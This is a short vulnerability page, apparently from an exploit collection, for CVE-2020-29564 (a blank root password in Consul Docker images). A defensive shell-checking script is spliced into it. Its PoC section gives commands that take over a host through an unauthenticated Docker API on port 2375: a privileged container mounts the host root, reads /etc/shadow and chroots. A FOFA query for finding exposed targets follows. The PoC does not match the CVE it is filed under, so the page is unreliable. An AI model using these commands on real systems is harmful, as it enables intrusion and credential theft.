    CVE-2020-29564 Consul Docker images 空密码登录漏洞.md
    634 B / 2021-05-21 09:14:38
        # CVE-2020-29564 Consul Docker images blank password login vulnerability
    
    Systems running Consul Docker containers deployed from Consul Docker images versions 0.7.1 through 1.4.2 may allow a remote attacker to gain root user access using a blank password.
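
A defender-side check for the condition described above, added here as an example and not part of the original write-up: it classifies the entries of a shadow(5) file extracted from an image and tests a Consul image tag against the affected range. The function names and the sample file are hypothetical, and it assumes the blank password appears as an empty second field in the image's `/etc/shadow`.

```bash
#!/bin/sh
# Added example (hypothetical helper names), not part of the original write-up.

# Print "user<TAB>status" per shadow(5) entry: blank, locked, hashed or malformed.
classify_shadow() {
    awk -F: '
        /^[ \t]*(#|$)/ { next }                      # skip comments and empty lines
        NF < 2         { print $1 "\tmalformed"; next }
        $2 == ""       { print $1 "\tblank";  next }  # login needs no password
        $2 ~ /^[!*]/   { print $1 "\tlocked"; next }  # password login disabled
                       { print $1 "\thashed" }
    ' "$1"
}

# Exit 0 only when no entry has an empty password field.
shadow_is_safe() {
    classify_shadow "$1" | awk -F'\t' '$2 == "blank" { bad = 1 } END { exit bad + 0 }'
}

# Exit 0 when tag x.y.z lies in the affected range stated on this page
# (0.7.1 through 1.4.2); exit 2 for tags that are not plain x.y.z.
consul_tag_affected() {
    echo "$1" | awk -F. '
        function key(a, b, c) { return a * 1000000 + b * 1000 + c }
        $0 !~ /^[0-9]+\.[0-9]+\.[0-9]+$/ { exit 2 }
        { v = key($1, $2, $3); exit !(v >= key(0, 7, 1) && v <= key(1, 4, 2)) }
    '
}

# Constructed sample shadow file (values are made up, not from a real image).
write_sample_shadow() {
    printf '%s\n' \
        'root:::0:::::' \
        'daemon:*:17000:0:::::' \
        'consul:!:17000:0:::::' \
        'app:$6$constructedsalt$constructedhash:17000:0:99999:7:::' > "$1"
}

# Demo: classify the sample and report the verdict.
sample=$(mktemp)
write_sample_shadow "$sample"
classify_shadow "$sample"
shadow_is_safe "$sample" || echo "FAIL: account with blank password present"
rm -f "$sample"
```

An account reported as `blank` should be locked or given a password in the image build, and images whose tag falls in the affected range should be rebuilt from a later release.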
    
    **PoC:**
    
    ```bash
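    # Connects to the Docker daemon's TCP API on <host>:2375 and mounts the host's / at /mnt
    docker -H <host>:2375 run --rm -it --privileged --net=host -v /:/mnt alpine

    # Inside the container:
    # File access
    cat /mnt/etc/shadow
    # RCE
    chroot /mnt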
    ```
    
    FOFA:
    
    ```
    port="2375" && protocol=="docker"
    ```
    
    ![](media/16096802412075/16096802747315.jpg)
    
    
    ![](media/16096802412075/16096802834542.jpg)
    
    
    **ref:**
    
    * https://forum.ywhack.com/thread-114824-1-2.html
    * https://github.com/koharin/koharin2/blob/main/CVE-2020-29564
    